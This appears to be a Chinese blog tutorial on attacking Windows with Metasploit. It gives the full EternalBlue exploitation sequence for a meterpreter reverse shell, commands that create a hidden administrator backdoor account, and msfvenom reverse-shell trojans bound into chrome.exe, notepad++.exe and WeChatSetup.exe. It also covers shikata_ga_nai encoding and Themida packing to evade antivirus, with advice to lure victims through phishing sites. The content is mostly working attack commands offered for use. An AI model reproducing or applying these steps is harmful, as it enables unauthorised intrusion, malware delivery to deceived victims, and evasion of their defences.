msf渗透测试框架_外用渗透力最强的渗透剂

msf渗透测试框架_外用渗透力最强的渗透剂包括metasploit是什么?、metasploit攻击windows操作系统、metasploit攻击永恒之蓝全流程、使用Kali渗透工具生成远控木马、metasploit攻击示例、msfv


包括 metasploit 是什么?、metasploit 攻击 windows 操作系统、metasploit 攻击永恒之蓝全流程、使用 Kali 渗透工具生成远控木马、metasploit 攻击示例、msfvenom 绕过杀毒软件技巧之捆绑木马、msfvenom 绕过杀毒软件技巧之加壳、windows 下安装 Themida、Themida 使用教程。


一、metasploit 是什么?

Kali 最强渗透工具 – metasploit

  • msf 是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的 shellcode,并持续保持更新

  • metasploit 让复杂的漏洞攻击流程变的非常简单,一个电脑小白经过几小时的学习,就能对操作系统等主流漏洞发起危害性攻击

二、metasploit 攻击 windows 操作系统

1、msfconsole:启动 metasploit 命令行 [命令行效率高,使用方便]

2、启动 metasploit 前需要做:

  • 打开 kali 终端

  • 使用 sudo su 命令,并输入 kali 的密码 kali,切换至 root 用户

  • 使用 msfdb init 命令初始化 metasploit 数据库(*可选)

3、操作步骤:

(1)、sudo su 切换到超级管理员 root 用户,密码 kali(无 root 用户需自行创建一个)

  • sudo su

在这里插入图片描述

(2)、msfconsole 启动 metasploit 命令行界面

  • msfconsole

在这里插入图片描述

三、metasploit 攻击永恒之蓝全流程

永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件

1、使用模块:use exploit/windows/smb/ms17_010_eternalblue

2、设置必选项:查看必选项 [*required 为 yes 的就是必选项] show options

3、操作步骤

(1)、可以使用编号进行搜索模块,永恒之蓝编号被微软定义为 ms17_010

  • search ms17_010

在这里插入图片描述

  • exploit:漏洞攻击脚本

如图,可以通过 Description 查看模块是干什么的

(2)、使用模块

两种方法:

  • use 模块名称

  • use 模块编号

在这里插入图片描述

(3)、配置(设置)模块,可以先查看有哪些设置,告诉 msf 攻击谁,要干啥

  • show options

在这里插入图片描述

  • Required(必选项):只需要配置必选项为 yes 的即可

  • RHOSTS:地址

  • RPORT:端口,默认445

  • VERIFY_ARCH、VERIFY_TARGET:这两选项已经是配置好的,保持默认即可

  • Payload options:攻击载荷,默认 windows/x64/meterpreter/reverse_tcp:获取到目标机器的命令执行权限;攻击之后,你想干啥

  • EXITFUNC:默认已经配置好

  • LHOST:监听地址,攻击机的ip地址

  • LPORT:监听端口

(4)、启动靶机,win 7

  • 靶机安装参考:【P3】最强渗透工具 – metasploit(安装配置及使用教程详解)

  • 靶机为 VMware 下的 Windows 虚拟机,Windows 版本无所谓

(5)、打开 cmd,使用 ipconfig 查看靶机 ip 地址

  • ipconfig

在这里插入图片描述

(6)、kali 设置攻击靶机地址

  • set RHOSTS 靶机ip

在这里插入图片描述

(7)、设置完毕后,可以再次使用 show options 查看是否配置齐全

  • show options

在这里插入图片描述

如图:查看 Required 配置项为 yes 的 Current Setting 当前设置是否为空,不为空即配置完毕

(8)、可以修改下默认的 LHOST 端口

  • set lport 22222

在这里插入图片描述

注:端口范围 0-65535


扩展:查看端口是否开放

① 查看445端口是否开启

  • netstat -an

在这里插入图片描述

② 此处攻击靶机一定要关闭防火墙

在这里插入图片描述


(9)、运行模块

  • run

在这里插入图片描述

如图,会自动进行攻击靶机,并且获取命名执行权限。攻击成功后,先打印 WIN 并进入 meterpreter

meterpreter:拿到了 Win 7 靶机的权限

(10)、可以使用 help 查看可以使用的命令

在这里插入图片描述

  • Command:命令

  • Description:命令的描述或解释

  • shutdown:关机

  • User interface Commands:用户接口命令

  • getdesktop:截图

  • keyscna:发送键盘指令

  • mouse:发送鼠标指令

(11)、退出

  • exit

在这里插入图片描述

四、metasploit 攻击成功后能做什么

1、攻击成功后能做什么

  • meterpreter 是强大的后渗透模块,可以输入 help 查看帮助信息

  • 远程控制、命令执行、摄像头监控、密码获取、创建后门用户、破坏篡改系统…这些看起来非常复杂又高级的操作都能用 meterpreter 中一行或几个字母,简单的命令完成

  • 例:创建后门用户并开启远程连接

    • shell

    • net user zhangsan /add && net localgroup administrators zhangsan /add

    • exit

    • run getgui -e

2、使用 Kali 渗透工具生成远控木马

(1)、msfvenom 是用来生成后门的软件,在目标机上执行后门,在本地监听上线

  • venom:毒,毒液

  • [* msfvenom 在 shell 里使用,不是 msfconsole 终端]

(2)、windows 可执行程序后门:

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.159.128 Iport=9999 -f exe -o demo.exe

  • msfvenom:执行使用的工具

  • -p:payload

  • windows/x64/meterpreter/reverse_tcp:payload_name 系统/架构/作用/方式;如果要攻击 Linux,将 windows 换成 Linux 即可(android,mac)

  • lhost=192.168.123.136 Iport=9999:payload设置(kali 地址,kali 端口)

  • -f:format

  • exe:exe,windows 可执行文件(ipk,jar,war)

  • -o:output,输入的文件名,如 demo.exe

4.1、操作步骤

(1)、生成木马文件

  • msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.159.128 Iport=9999 -f exe -o demo.exe

在这里插入图片描述

(2)、如图,文件生成在当前路径下

  • 可以使用 ls 进行查看

  • 可以使用 pwd 查看工作目录的绝对路径

在这里插入图片描述

(3)、可以使用钓鱼网站等诱骗受害人点击

在这里插入图片描述

(4)、将木马下载到本地,demo.exe

拉取到本地时,一定要关闭杀毒软件

木马病毒下载到本地会被杀毒软件截取,后续需要让木马绕过杀毒软件

在这里插入图片描述

木马病毒不可以直接运行,就跟钓鱼一样,需要将木马放在鱼钩上

(5)、终端控制台进入 msfconsole

  • msfconsole

在这里插入图片描述

(6)、使用 exploit/multi/handler 模块

  • use exploit/multi/handler

在这里插入图片描述

(7)、查看设置

  • show options

  • 可简写:options

在这里插入图片描述

  • Payload options:攻击载荷设置(设置成生成可执行程序后门时设置的 playload_name)

(8)、设置攻击载荷设置(设置成生成可执行程序后门时设置的 playload_name)

  • set payload windows/x64/meterpreter/reverse_tcp

在这里插入图片描述

(9)、设置 kali 地址

  • set lhost 192.168.159.128

在这里插入图片描述

(10)、设置端口(设置成生成可执行程序后门时设置的 Iport,必须一致)

  • set lport 9999

在这里插入图片描述

(11)、可以使用 options 再次查看设置信息

在这里插入图片描述

(12)、运行

  • run

在这里插入图片描述

现在鱼钩已经扔河里了,等待鱼儿上钩,有两种方法:1、将鱼儿摁在勾上,利用漏洞;2、姜太公钓鱼,愿者上钩。诱导鱼儿上钩

(13)、假如受害者上钩,双击本地的 deom.exe 文件

在这里插入图片描述

(14)、如图,受害者已上钩

在这里插入图片描述

  • meterpreter:获取到受害者电脑的执行权限

(15)、输入 help,查看可以执行的命令操作

  • help

在这里插入图片描述

4.2、攻击示例

(1)、webcam_list,查看受害者电脑是否有摄像头

  • webcam_list

在这里插入图片描述

(2)、我使用的是台式机,所以没有摄像头

五、msfvenom 绕过杀毒软件技巧

最基础的免杀 [ 对于其他杀毒软件效果不同,具体情况请自行尝试]*

5.1、捆绑木马

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.159.128 lport=9999 -f exe -x notepad++.exe -o notepad++.exe msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.159.128 lport=9999 -f exe -x chrome.exe -o chrome.exe msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.159.128 lport=9999 -f exe -x firefox.exe -o firefox.exe msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.159.128 lport=9999 -f exe -o firefox.exe - -x:模板(要使用哪一个正常程序的模板作为后门的生成) 注:如果 notepad++ 过不了,可以换其它软件;路径下必须存在可执行程序 - -e /指定编码方式对攻击载荷进行重新编码 - -x /指定木马捆绑在哪个可执行程序模板上 - -i /指定对目标进行编码的次数,多次编码理论上有助于免杀的实现 - -f /指定 msf 编码器输出程序的格式 - -o /指定处理完毕后的文件输出路径 

注:使用捆绑木马时,路径下必须存在可执行程序

(1)、在生成木马的路径下,先复制一个可执行程序过去,比如:chrome.exe

在这里插入图片描述

(2)、使用 msfvenom 生成一个 Windows 环境下的木马,并捆绑到 chrome.exe 上生成 chrome01.exe 的合成马

  • msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.159.128 lport=9999 -f exe -x chrome.exe -o chrome01.exe

其它示例:

  • msfvenom -p windows/shell_reverse_tcp LHOST=192.168.111.132 LPORT=9999 -e x86/shikata_ga_nai -x WeChatSetup.exe -i 12 -f exe -o /root/WeChatSetup1.exe

x86/shikata_ga_nai 进行多次编码的方式进行免杀处理

在这里插入图片描述

(3)、在此路径下,可以看到生成一个 chrome01.exe 的木马

在这里插入图片描述

5.2、加壳:压缩壳、加密壳

5.2.1、Themida:加壳软件
5.2.1.1、Linux 下安装 Themida
  • Themida Linux下rar包 百度网盘下载链接:https://pan.baidu.com/s/1v6q8y0Xg-SXMUXX4roEyJg?pwd=8fr8

  • 提取码:8fr8

注:此压缩包 rar包,必须在 Linux 系统下进行解压,使用需要在 windows 下使用


扩展:解压rar包

(1)、安装 rar 包教程参考:【P3】最强渗透工具 – metasploit(安装配置及使用教程详解)

(2)、解压rar包

在这里插入图片描述


5.2.1.2、windows 下安装 Themida
  • Themida windows下文件夹百度网盘下载链接:https://pan.baidu.com/s/1vGaNf92vzUZbsMlzMwXNFA?pwd=sfcx

  • 提取码:sfcx

  • 下载后得到名为 Themida_x32_x64_v3.0.4.0_Repacked 的文件夹

在这里插入图片描述

5.2.1.2、Themida 使用教程

在这里插入图片描述

注:Themida.exe为32位;Themida64.exe为64位

(1)、打开下载后的 Themida_x32_x64_v3.0.4.0_Repacked 文件夹,双击 Themida64.exe 执行文件

在这里插入图片描述

在这里插入图片描述

(2)、将未加壳的木马可执行程序拉到 Themida 软件中

在这里插入图片描述

在这里插入图片描述

  • 也可以在 Themida 软件中选择导入的木马文件路径

(3)、点击 Protext 进行加壳

注:加壳前,先将杀毒软件关闭,等加壳完成后再打开

在这里插入图片描述

自动进行加壳保护,成功后,在本地会生成一个添加 Protext 名称的文件

(4)、如图,加壳完成,点击 Close 即可

在这里插入图片描述

在这里插入图片描述

今天的文章
msf渗透测试框架_外用渗透力最强的渗透剂分享到此就结束了,感谢您的阅读。

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。
如需转载请保留出处:https://bianchenghao.cn/80809.html

(0)
编程小号编程小号

相关推荐

发表回复

您的电子邮箱地址不会被公开。 必填项已用 * 标注